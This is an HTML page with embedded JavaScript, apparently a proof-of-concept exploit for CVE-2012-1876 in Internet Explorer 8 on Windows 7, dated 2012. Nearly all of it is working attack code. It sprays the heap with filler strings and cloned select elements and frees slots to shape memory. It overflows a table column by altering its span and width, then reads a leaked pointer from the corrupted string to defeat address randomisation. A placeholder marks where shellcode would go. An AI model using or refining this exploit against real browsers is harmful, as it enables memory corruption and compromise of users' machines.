cve-2012-1876 win7_ie8_leak_shellcode code
2012-08-08 12:55
<html> <body> <div id="test"></div> <script> alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0 = "AMSZZABCDEFGHIJKLMN"//shellcode selob.w1 = this; selob.w2 = new Array(); selob.w3 = true; selob.w4 = 0x41424344; selob.w5 = document.createElement("marquee"); selob.w6 = undefined; selob.w7 = null; selob.w8 = alert; selob.w9 = RegExp.$1; selob.w10 = Infinity; selob.w12 = 0x41424344; selob.w13 = 0x41424344; selob.w14 = 0x41424344; selob.w15 = 0x41424344; selob.w16 = 0x41424344; var fillbuff = new Array(); var string_A="CORE1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; var string_B="CORE2BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; var 
string_C="CORE3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"; for(var i=0;i<3000;i+=4) { fillbuff[i]=string_A.substr(0,125); fillbuff[i+1]=string_B.substr(0,125); fillbuff[i+2]=string_C.substr(0,125); fillbuff[i+3]=selob.cloneNode(true); } alert("select") for(var i=4;i<3000;i+=12) { fillbuff[i]=null; } CollectGarbage(); alert("layout the heap") </script> <table style="table-layout:fixed" > <col id="132" width="41" span="9" > </col> </table> <script language='javascript'> var obj_col = document.getElementById("132"); obj_col.width = "42765"; obj_col.span = 19; function overtar() { var leak_addr = -1; alert(1) for ( var i = 2; i < 3000; i+=4 ) { if ( fillbuff[i].length > (0x100-6)/2 ) { // overflowed leak_index = i; //var leak = fillbuff[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2); var leak = fillbuff[i].substring((0x100-6)/2+(2+8+12)/2, (0x100-6)/2+(2+8+12+4)/2); leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ); //mshtmlbase = leak_addr - Number(0x001582b8); alert(leak_addr); break; } } } //get object address setTimeout("overtar();",1); </script> </body> </html>